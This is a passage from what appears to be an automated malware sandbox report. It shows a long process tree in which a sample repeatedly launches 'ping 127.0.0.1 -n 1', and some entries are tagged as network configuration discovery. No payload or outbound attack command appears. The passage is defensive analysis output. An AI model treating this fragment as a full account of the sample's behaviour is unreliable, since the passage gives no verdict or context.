                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                    PID:5768
                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2284
                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                      PID:12960
                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                      PID:6164
                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6204
                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                        PID:6568
                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:6620
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:6664
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                          PID:6700
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                          PID:6808
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:6756
                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:6836
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:6888
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:6936
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                PID:6992
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:7036
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:7080
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:7164
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:3700
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                PID:3124
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                PID:5720
                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2840
                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                  PID:7220
                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:7260
                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                    PID:7296
                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:7340
                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:7408
                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:7452
                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:7476
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7536
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7724
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7640
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7600
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            PID:7556
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                            PID:7796
                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:7884
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:7920
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                PID:8024
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                PID:8068
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                PID:8112
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                PID:8160
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                PID:4728
                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:8544
                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                    PID:8456
                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:8400
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:8352
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:8292
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:8240
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:3428
                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                        PID:416
                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:852
                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                          PID:8552
                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:8592
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                            PID:8640
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                            PID:8680
                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:8744
                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                              PID:8788
                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                              PID:8856
                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:8892
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                PID:8940
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:8992
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:9036
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                PID:9084
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:9128
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:9300
                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:9532
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                  PID:9564
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                  PID:9636
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                  PID:9680
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                  PID:9788
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:9900
                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:10108
                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1144
                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                        PID:10316
                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:10360
                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                          PID:10412
                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:10448
                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:10496
                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:10540
                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                              PID:10600
                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:10640
                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:10668
                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                  PID:10720
                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                  PID:10788
                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:10824
                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                    PID:10868
                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                    PID:10912
                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:10968
                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:11028
                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:11144
                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                          PID:11216
                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:11260
                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5284
                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:11304
                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                PID:11344
                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:12052
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:12008
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:11960
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:11916
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                  PID:11872
                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:11824
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                    PID:11780
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                    PID:11736
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                    PID:11692
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                    PID:11644
                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:11600
                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                      PID:11556
                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:6084
                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                          PID:2912
                                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:1356
                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5944
                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:4288
                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:12812
                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:12884
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                    PID:12940
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                    ping 127.0.0.1 -n 1
